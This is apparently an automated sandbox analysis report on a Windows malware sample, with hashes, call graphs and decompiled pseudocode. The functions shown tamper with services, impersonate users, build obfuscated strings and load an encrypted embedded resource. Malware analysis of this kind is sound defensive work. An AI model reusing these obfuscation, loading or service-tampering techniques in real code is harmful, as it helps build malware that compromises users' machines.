                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                • String ID:
                                                • API String ID: 1632413811-0
                                                • Opcode ID: 92116ab681be5d325e4a541d75da0747dd7045d169ae2f66a4311d0443571811
                                                • Instruction ID: 9a46bc3eaa383cd3606c9e09be2f4c9bcf41b73ab86ae1799aa0bcf0cafb315c
                                                • Opcode Fuzzy Hash: 92116ab681be5d325e4a541d75da0747dd7045d169ae2f66a4311d0443571811
                                                • Instruction Fuzzy Hash: 41F0F8B02183099FD714AB34BD0E635BB61FB047F1B110639E966862E1CF3A8564CE15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F6952(CHAR* __ecx) {
                                                				long _v8;
                                                				long _v12;
                                                				long _v16;
                                                				char _v20;
                                                				int _t22;
                                                
                                                				_t22 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				if( *__ecx != 0) {
                                                					_t6 =  &_v20; // 0x2f5760
                                                					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                					}
                                                				}
                                                				return _t22;
                                                			}








                                                0x002f695b
                                                0x002f6960
                                                0x002f6963
                                                0x002f6966
                                                0x002f6969
                                                0x002f696c
                                                0x002f6972
                                                0x002f6987
                                                0x002f699f
                                                0x002f699f
                                                0x002f6987
                                                0x002f69a7

                                                APIs
                                                • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W/,?,00000000,002F5760,?,A:\), ref: 002F697F
                                                • MulDiv.KERNEL32(?,?,00000400), ref: 002F6999
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: DiskFreeSpace
                                                • String ID: `W/
                                                • API String ID: 1705453755-3921536248
                                                • Opcode ID: 473646e679e066438ee0f2e7fdb649029d179975f2045e23d96718aadaff5f63
                                                • Instruction ID: e07101e86c10292bb6951d316be17307febf11e0190d2bdd5fe8f91875a0a073
                                                • Opcode Fuzzy Hash: 473646e679e066438ee0f2e7fdb649029d179975f2045e23d96718aadaff5f63
                                                • Instruction Fuzzy Hash: EAF0E7B6D1022CBBCB11DFE89848AEEBBBCEB48750F1041A6A614E2240D6719A108B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_00007FF9A56C0E52 28 Function_00007FF9A56C102C 0->28 1 Function_00007FF9A56C0198 2 Function_00007FF9A56C01D8 2->1 2->2 16 Function_00007FF9A56C01C8 2->16 26 Function_00007FF9A56C01B8 2->26 33 Function_00007FF9A56C01E8 2->33 35 Function_00007FF9A56C01A8 2->35 3 Function_00007FF9A56C0158 4 Function_00007FF9A56C0118 5 Function_00007FF9A56C000C 6 Function_00007FF9A56C214A 19 Function_00007FF9A56C223A 6->19 7 Function_00007FF9A56C190A 7->3 7->4 15 Function_00007FF9A56C0148 7->15 17 Function_00007FF9A56C0108 7->17 18 Function_00007FF9A56C0188 7->18 27 Function_00007FF9A56C0178 7->27 36 Function_00007FF9A56C0128 7->36 8 Function_00007FF9A56C108A 9 Function_00007FF9A56C06CA 10 Function_00007FF9A56C2049 11 Function_00007FF9A56C1B10 11->10 12 Function_00007FF9A56C0710 25 Function_00007FF9A56C0138 12->25 13 Function_00007FF9A56C0E02 14 Function_00007FF9A56C1188 14->4 14->12 14->17 14->36 16->1 16->2 16->16 16->26 16->33 16->35 20 Function_00007FF9A56C0A7E 20->3 20->4 20->15 34 Function_00007FF9A56C0168 20->34 21 Function_00007FF9A56C077D 29 Function_00007FF9A56C0A2E 21->29 22 Function_00007FF9A56C0C34 22->13 23 Function_00007FF9A56C2273 24 Function_00007FF9A56C1838 24->4 24->17 24->36 26->1 26->2 26->16 26->26 26->33 26->35 30 Function_00007FF9A56C06ED 30->25 31 Function_00007FF9A56C0B2D 31->3 31->4 31->34 32 Function_00007FF9A56C1262 33->1 33->2 33->16 33->26 33->33 33->35 37 Function_00007FF9A56C1760 38 Function_00007FF9A56C1A1D 38->4 38->18

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 17 7ff9a56c1b10-7ff9a56c1b17 18 7ff9a56c1b22-7ff9a56c1bd8 17->18 19 7ff9a56c1b19-7ff9a56c1b21 17->19 23 7ff9a56c1c36-7ff9a56c1c68 18->23 24 7ff9a56c1bda-7ff9a56c1be9 18->24 19->18 31 7ff9a56c1cc7-7ff9a56c1d00 23->31 32 7ff9a56c1c6a-7ff9a56c1c7a 23->32 24->23 25 7ff9a56c1beb-7ff9a56c1bee 24->25 26 7ff9a56c1c28-7ff9a56c1c30 25->26 27 7ff9a56c1bf0-7ff9a56c1c03 25->27 26->23 29 7ff9a56c1c07-7ff9a56c1c1a 27->29 30 7ff9a56c1c05 27->30 29->29 33 7ff9a56c1c1c-7ff9a56c1c24 29->33 30->29 38 7ff9a56c1d02-7ff9a56c1d11 31->38 39 7ff9a56c1d5e-7ff9a56c1d97 31->39 32->31 34 7ff9a56c1c7c-7ff9a56c1c7f 32->34 33->26 36 7ff9a56c1c81-7ff9a56c1c94 34->36 37 7ff9a56c1cb9-7ff9a56c1cc1 34->37 40 7ff9a56c1c98-7ff9a56c1cab 36->40 41 7ff9a56c1c96 36->41 37->31 38->39 42 7ff9a56c1d13-7ff9a56c1d16 38->42 49 7ff9a56c1df6-7ff9a56c1e2f 39->49 50 7ff9a56c1d99-7ff9a56c1da9 39->50 40->40 43 7ff9a56c1cad-7ff9a56c1cb5 40->43 41->40 44 7ff9a56c1d18-7ff9a56c1d2b 42->44 45 7ff9a56c1d50-7ff9a56c1d58 42->45 43->37 47 7ff9a56c1d2f-7ff9a56c1d42 44->47 48 7ff9a56c1d2d 44->48 45->39 47->47 51 7ff9a56c1d44-7ff9a56c1d4c 47->51 48->47 58 7ff9a56c1e31-7ff9a56c1e41 49->58 59 7ff9a56c1e8e-7ff9a56c1ec7 49->59 50->49 52 7ff9a56c1dab-7ff9a56c1dae 50->52 51->45 53 7ff9a56c1de8-7ff9a56c1df0 52->53 54 7ff9a56c1db0-7ff9a56c1dc3 52->54 53->49 56 7ff9a56c1dc7-7ff9a56c1dda 54->56 57 7ff9a56c1dc5 54->57 56->56 60 7ff9a56c1ddc-7ff9a56c1de4 56->60 57->56 58->59 61 7ff9a56c1e43-7ff9a56c1e46 58->61 65 7ff9a56c1f26-7ff9a56c1fe2 ChangeServiceConfigA 59->65 66 7ff9a56c1ec9-7ff9a56c1ed9 59->66 60->53 63 7ff9a56c1e48-7ff9a56c1e5b 61->63 64 7ff9a56c1e80-7ff9a56c1e88 61->64 67 7ff9a56c1e5f-7ff9a56c1e72 63->67 68 7ff9a56c1e5d 63->68 64->59 76 7ff9a56c1fe4 65->76 77 7ff9a56c1fea-7ff9a56c1ffc call 7ff9a56c2049 65->77 66->65 69 7ff9a56c1edb-7ff9a56c1ede 66->69 67->67 70 7ff9a56c1e74-7ff9a56c1e7c 67->70 68->67 71 7ff9a56c1f18-7ff9a56c1f20 69->71 72 7ff9a56c1ee0-7ff9a56c1ef3 69->72 70->64 71->65 74 7ff9a56c1ef7-7ff9a56c1f0a 72->74 75 7ff9a56c1ef5 72->75 74->74 78 7ff9a56c1f0c-7ff9a56c1f14 74->78 75->74 76->77 80 7ff9a56c2001-7ff9a56c202d 77->80 78->71 81 7ff9a56c2034-7ff9a56c2048 80->81 82 7ff9a56c202f 80->82 82->81
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: ChangeConfigService
                                                • String ID:
                                                • API String ID: 3849694230-0
                                                • Opcode ID: 274da5e72f4615d634026e79fe3c698fbc91ac20477656acfd1bdc9b634d2b6f
                                                • Instruction ID: a5621285e12717bbe4939f02cb41bd3c919c496d6c812b1f2b9a09fd1c4787c9
                                                • Opcode Fuzzy Hash: 274da5e72f4615d634026e79fe3c698fbc91ac20477656acfd1bdc9b634d2b6f
                                                • Instruction Fuzzy Hash: 3FF1B930A18A4D4FEB68DF28D8467F977D0FB59710F10427EE88EC7281DA75A9818782
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: db296b7349d1faa866909c87ab291ac9155d028dab577f6da533939dca49364c
                                                • Instruction ID: b6fcbc3641a79a22663f739a2fea15b6971ee3d4d77b26db63588ca99c56da9b
                                                • Opcode Fuzzy Hash: db296b7349d1faa866909c87ab291ac9155d028dab577f6da533939dca49364c
                                                • Instruction Fuzzy Hash: 3F916030A19A4D8FEBA8DF28D8557E977D1FF59310F00817AE84DC7291CB75A941CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 117 7ff9a56c0c34-7ff9a56c0c3b 118 7ff9a56c0c46-7ff9a56c0ce5 117->118 119 7ff9a56c0c3d-7ff9a56c0c45 117->119 123 7ff9a56c0ce7-7ff9a56c0cf6 118->123 124 7ff9a56c0d40-7ff9a56c0daa OpenServiceA 118->124 119->118 123->124 125 7ff9a56c0cf8-7ff9a56c0cfb 123->125 131 7ff9a56c0db2-7ff9a56c0de6 call 7ff9a56c0e02 124->131 132 7ff9a56c0dac 124->132 126 7ff9a56c0d35-7ff9a56c0d3d 125->126 127 7ff9a56c0cfd-7ff9a56c0d10 125->127 126->124 129 7ff9a56c0d14-7ff9a56c0d27 127->129 130 7ff9a56c0d12 127->130 129->129 133 7ff9a56c0d29-7ff9a56c0d31 129->133 130->129 136 7ff9a56c0de8 131->136 137 7ff9a56c0ded-7ff9a56c0e01 131->137 132->131 133->126 136->137
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: OpenService
                                                • String ID:
                                                • API String ID: 3098006287-0
                                                • Opcode ID: 2ff79beb8c1191a793af9bf1a47e4d8020303cba33896bd2081a6974f62da873
                                                • Instruction ID: 0642617bc7615362f0863f57fb47b915bc5469a0da98de187b4b0b090188f4f2
                                                • Opcode Fuzzy Hash: 2ff79beb8c1191a793af9bf1a47e4d8020303cba33896bd2081a6974f62da873
                                                • Instruction Fuzzy Hash: DD518470A18A8D4FEB58EF28D8467F977E1FB59315F10412EE84EC3292DE75E8418B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: ManagerOpen
                                                • String ID:
                                                • API String ID: 1889721586-0
                                                • Opcode ID: c956444aded82a9fdbf7e86dd8d067ef3385b15934404fc66a08716894a9ef16
                                                • Instruction ID: 7f9d3970ae01d87c00142fe0ee89e84998a93406423452ce630ed09564a2fe1e
                                                • Opcode Fuzzy Hash: c956444aded82a9fdbf7e86dd8d067ef3385b15934404fc66a08716894a9ef16
                                                • Instruction Fuzzy Hash: DC41E331E0DA484FDB68DB9898497FDBBE0EF56721F04413FD08ED3252CEA5A8058B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: ControlService
                                                • String ID:
                                                • API String ID: 253159669-0
                                                • Opcode ID: 9c19b8b8701536f3ae09eaf7b9ac1ac54a8d16a68a8f0a94d189db6acd566c17
                                                • Instruction ID: ab3a710c777db254967a443a1b565b4f8e94af3fe771bd76abce06df6ac64d2e
                                                • Opcode Fuzzy Hash: 9c19b8b8701536f3ae09eaf7b9ac1ac54a8d16a68a8f0a94d189db6acd566c17
                                                • Instruction Fuzzy Hash: 3B41D631E0CA584FDB18EB9CA8457FD7BE1EF56721F04417EE08ED3292CA6568068781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: ImpersonateLoggedUser
                                                • String ID:
                                                • API String ID: 2216092060-0
                                                • Opcode ID: 0d5ca02afb200b3450b4474be3cea7b8c56e9f6c83023907501584993a085944
                                                • Instruction ID: d78455a7be55d75edc3959bf88c5fb5cfe1ed3fbeeda66ef4daf974a049d6772
                                                • Opcode Fuzzy Hash: 0d5ca02afb200b3450b4474be3cea7b8c56e9f6c83023907501584993a085944
                                                • Instruction Fuzzy Hash: 6C310831A0CA4C8FEB58DF6898057F9BBE0FB56321F00416FD089C3592DB75A456CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 188 7ff9a56c108a-7ff9a56c10b3 189 7ff9a56c10b5-7ff9a56c10bd 188->189 190 7ff9a56c10be-7ff9a56c1152 FindCloseChangeNotification 188->190 189->190 194 7ff9a56c1154 190->194 195 7ff9a56c115a-7ff9a56c1181 190->195 194->195
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: ee339fc8103ad06008a6151abefa0326835051b69bd49904954943a83747687f
                                                • Instruction ID: f657fe33ed6cb9ef76ad852a8af7dd10ca5d0c689a6253cb1bff656f19aaabb1
                                                • Opcode Fuzzy Hash: ee339fc8103ad06008a6151abefa0326835051b69bd49904954943a83747687f
                                                • Instruction Fuzzy Hash: 8931F63090C78C5FDB0ADB6888157E97FF0EF57320F04429FD089C35A2DA656856CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 32 401cd0-401cd4 22->32 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 32->36 37 401cd6-401cd8 32->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 68 401d55-401d57 62->68 66 401d3a-401d40 63->66 67 401d4c-401d4e 63->67 66->62 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                C-Code - Quality: 77%
                                                			E004019F0(void* __edx, void* __eflags) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t337;
                                                				void* _t340;
                                                				int _t341;
                                                				CHAR* _t344;
                                                				intOrPtr* _t349;
                                                				int _t350;
                                                				long _t352;
                                                				signed int _t354;
                                                				intOrPtr _t358;
                                                				long _t359;
                                                				CHAR* _t364;
                                                				struct HINSTANCE__* _t365;
                                                				CHAR* _t366;
                                                				_Unknown_base(*)()* _t367;
                                                				int _t368;
                                                				int _t369;
                                                				int _t370;
                                                				intOrPtr* _t376;
                                                				int _t378;
                                                				intOrPtr _t379;
                                                				intOrPtr* _t381;
                                                				int _t383;
                                                				intOrPtr* _t384;
                                                				int _t385;
                                                				int _t396;
                                                				int _t399;
                                                				int _t402;
                                                				int _t405;
                                                				intOrPtr* _t407;
                                                				int _t413;
                                                				int _t415;
                                                				void* _t421;
                                                				int _t422;
                                                				int _t424;
                                                				intOrPtr* _t428;
                                                				intOrPtr _t429;
                                                				intOrPtr* _t431;
                                                				int _t432;
                                                				int _t435;
                                                				intOrPtr* _t437;
                                                				int _t438;
                                                				intOrPtr* _t439;
                                                				int _t440;
                                                				int _t442;
                                                				signed int _t448;
                                                				signed int _t451;
                                                				signed int _t452;
                                                				int _t469;
                                                				int _t471;
                                                				int _t482;
                                                				signed int _t486;
                                                				intOrPtr* _t488;
                                                				intOrPtr* _t490;
                                                				intOrPtr* _t492;
                                                				intOrPtr _t493;
                                                				void* _t494;
                                                				struct HRSRC__* _t497;
                                                				void* _t514;
                                                				int _t519;
                                                				intOrPtr* _t520;
                                                				void* _t524;
                                                				void* _t525;
                                                				struct HINSTANCE__* _t526;
                                                				intOrPtr _t527;
                                                				void* _t531;
                                                				void* _t535;
                                                				struct HRSRC__* _t536;
                                                				intOrPtr* _t537;
                                                				intOrPtr* _t539;
                                                				int _t542;
                                                				int _t543;
                                                				intOrPtr* _t547;
                                                				intOrPtr* _t548;
                                                				intOrPtr* _t549;
                                                				intOrPtr* _t550;
                                                				void* _t551;
                                                				intOrPtr _t552;
                                                				int _t555;
                                                				void* _t556;
                                                				void* _t557;
                                                				void* _t558;
                                                				void* _t559;
                                                				void* _t560;
                                                				void* _t561;
                                                				void* _t562;
                                                				intOrPtr* _t563;
                                                				void* _t564;
                                                				void* _t565;
                                                				void* _t566;
                                                				void* _t567;
                                                
                                                				_t567 = __eflags;
                                                				_t494 = __edx;
                                                				__imp__OleInitialize(0); // executed
                                                				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                				 *((char*)(_t556 + 0x21)) = 0x20;
                                                				 *((char*)(_t556 + 0x22)) = 0x64;
                                                				 *((char*)(_t556 + 0x23)) = 6;
                                                				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                				 *((char*)(_t556 + 0x29)) = 0xee;
                                                				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                				 *((char*)(_t556 + 0x33)) = 0x78;
                                                				 *((char*)(_t556 + 0x34)) = 0x98;
                                                				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                				 *((char*)(_t556 + 0x38)) = 0;
                                                				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                				_t557 = _t556 + 0xc;
                                                				if(_t337 == 0x41b2a0) {
                                                					L80:
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                					_t525 = _t340;
                                                					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                					 *((char*)(_t557 + 0x64)) = 0xce;
                                                					 *((char*)(_t557 + 0x65)) = 0x27;
                                                					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                					 *((char*)(_t557 + 0x68)) = 0x95;
                                                					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                					 *((char*)(_t557 + 0x71)) = 0x98;
                                                					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                					 *((char*)(_t557 + 0x75)) = 0x87;
                                                					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                					 *((char*)(_t557 + 0x77)) = 0xf;
                                                					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                					 *((char*)(_t557 + 0x79)) = 0x76;
                                                					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                					 *((char*)(_t557 + 0x80)) = 0x98;
                                                					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                					 *((char*)(_t557 + 0x84)) = 0;
                                                					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                					 *((char*)(_t557 + 0x19)) = 0x38;
                                                					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                					 *((char*)(_t557 + 0x21)) = 0x29;
                                                					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                					 *((char*)(_t557 + 0x23)) = 0x56;
                                                					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                					 *((char*)(_t557 + 0x25)) = 0x98;
                                                					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                					 *((char*)(_t557 + 0x29)) = 0x87;
                                                					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                					 *((char*)(_t557 + 0x33)) = 0x78;
                                                					 *((char*)(_t557 + 0x34)) = 0x98;
                                                					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                					 *((char*)(_t557 + 0x38)) = 0;
                                                					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                					if(_t341 == 0) {
                                                						L38:
                                                						FindCloseChangeNotification(_t525); // executed
                                                						_t526 = GetModuleHandleA(0);
                                                						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                						 *((char*)(_t557 + 0x21)) = 0x44;
                                                						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                						 *((char*)(_t557 + 0x23)) = 0x23;
                                                						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                						 *((char*)(_t557 + 0x25)) = 0x45;
                                                						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                						 *((char*)(_t557 + 0x27)) = 0x56;
                                                						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                						 *((char*)(_t557 + 0x29)) = 0x98;
                                                						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                						 *((char*)(_t557 + 0x2b)) = 0xf4;
